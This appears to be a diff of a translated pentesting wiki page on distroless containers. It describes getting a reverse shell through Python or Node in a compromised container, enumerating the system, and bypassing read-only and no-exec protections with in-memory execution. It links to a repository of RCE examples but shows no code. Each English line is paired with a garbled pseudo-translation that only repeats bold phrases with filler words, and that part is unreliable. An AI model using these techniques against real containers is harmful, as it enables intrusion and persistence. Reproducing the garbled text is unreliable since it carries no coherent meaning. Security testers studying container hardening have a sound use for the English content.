Distroless containers contain only the **bare minimum components necessary to run a specific application or service**, such as libraries and runtime dependencies, but exclude larger components like a package manager, shell, or system utilities. Distroless containers **bare minimum components necessary to run a specific application or service** vItlhutlh, **libraries and runtime dependencies** vItlhutlh, **package manager, shell, or system utilities** vItlhutlh.
The goal of distroless containers is to **reduce the attack surface of containers by eliminating unnecessary components** and minimising the number of vulnerabilities that can be exploited. Distroless containers **reduce the attack surface of containers by eliminating unnecessary components** **minimising the number of vulnerabilities that can be exploited**.
### Reverse Shell ### Reverse Shell
In a distroless container you might **not even find `sh` or `bash`** to get a regular shell. You won't also find binaries such as `ls`, `whoami`, `id`... everything that you usually run in a system. Distroless container **`sh` or `bash`** **find**. **ls**, **whoami**, **id**... **binaries** **find**.
{% hint style="warning" %} {% hint style="warning" %}
Therefore, you **won't** be able to get a **reverse shell** or **enumerate** the system as you usually do. **reverse shell** **enumerate** **system** **able**.
{% endhint %} {% endhint %}
However, if the compromised container is running for example a flask web, then python is installed, and therefore you can grab a **Python reverse shell**. If it's running node, you can grab a Node rev shell, and the same with mostly any **scripting language**. **compromised container** **flask web** run, **python** **installed**, **Python reverse shell** **grab**. **node** run, **Node rev shell** **grab**, **scripting language** **grab**.
{% hint style="success" %} {% hint style="success" %}
Using the scripting language you could **enumerate the system** using the language capabilities. **scripting language** **enumerate the system** **use**.
{% endhint %} {% endhint %}
If there is **no `read-only/no-exec`** protections you could abuse your reverse shell to **write in the file system your binaries** and **execute** them. **`read-only/no-exec`** **protections** **abuse** **reverse shell** **write in the file system your binaries** **execute**.
{% hint style="success" %} {% hint style="success" %}
However, in this kind of containers these protections will usually exist, but you could use the **previous memory execution techniques to bypass them**. **kind of containers** **protections** **usually exist**, **previous memory execution techniques to bypass them** **use**.
{% endhint %} {% endhint %}
You can find **examples** on how to **exploit some RCE vulnerabilities** to get scripting languages **reverse shells** and execute binaries from memory in [**https://github.com/carlospolop/DistrolessRCE**](https://github.com/carlospolop/DistrolessRCE). **exploit some RCE vulnerabilities** **reverse shells** **execute binaries from memory** **examples** [**https://github.com/carlospolop/DistrolessRCE**](https://github.com/carlospolop/DistrolessRCE).
<details> <details>

Some files were not shown because too many files have changed in this diff Show more